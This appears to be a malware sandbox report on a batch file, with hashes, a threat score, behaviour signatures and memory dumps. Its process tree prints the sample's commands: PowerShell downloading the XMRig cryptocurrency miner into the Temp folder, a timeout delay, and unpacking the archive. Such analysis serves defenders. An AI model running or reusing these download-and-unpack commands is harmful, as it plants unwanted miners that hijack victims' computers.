Overview

overview

10

Static

static

10

5DKQH_s.bat

windows7-x64

8

5DKQH_s.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-12-2024 15:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    5DKQH_s.bat

  • Size

    1KB

  • MD5

    ccc7afd46efac5aca2f96dc6c6d757b5

  • SHA1

    981911ae2cf8c85fd9bbb70ea938105617c2aefd

  • SHA256

    35347449c9856b13ee6f4131fc675270c55566881a19cc3d6bc5d2b0709412bb

  • SHA512

    1d336a5827812cd871bdb1459536c5052e4cc50bde82d3e5fd7e474a1488bf55a0763f1d2cac7f6569a2ac6334f066a465cb7b74e52ddbb2d23bd2a31e7b3563

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Powershell Invoke Web Request.

    execution
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\5DKQH_s.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2508
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip -OutFile C:\Users\Admin\AppData\Local\Temp\xmrig-6.22.2-msvc-win64.zip"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1816
    • C:\Windows\system32\timeout.exe
      timeout /t 10
      2⤵
      • Delays execution with timeout.exe
      PID:3000
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Expand-Archive -Path C:\Users\Admin\AppData\Local\Temp\xmrig-6.22.2-msvc-win64.zip -DestinationPath C:\Users\Admin\AppData\Local\Temp\xmrig"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2100

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    88714f16f09ef67d0c2468c6f3af79d1

    SHA1

    a7caf8ea1e13f81fff0a6203f62ae1bf92428c6b

    SHA256

    1408975b083464abf4934e48649266e4b7134cbcb1125ecb7b675739e9f06c12

    SHA512

    24cedd9b503d61ff449878e794bb8f0b6875788c265a9ce08d790c7456756bc730af851a583f90ee452baa8a8ce036aa89f2eb0cac90cae3bc4579cea8078bbf

    Download Submit

  • memory/1816-4-0x000007FEF52CE000-0x000007FEF52CF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1816-5-0x000000001B710000-0x000000001B9F2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1816-6-0x0000000002340000-0x0000000002348000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1816-7-0x000007FEF5010000-0x000007FEF59AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1816-11-0x000007FEF5010000-0x000007FEF59AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1816-10-0x000007FEF5010000-0x000007FEF59AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1816-9-0x0000000002DCB000-0x0000000002E32000-memory.dmp

    Filesize

    412KB

    Download

  • memory/1816-8-0x0000000002DC4000-0x0000000002DC7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/2100-18-0x0000000001E00000-0x0000000001E08000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2100-17-0x000000001B780000-0x000000001BA62000-memory.dmp

    Filesize

    2.9MB

    Download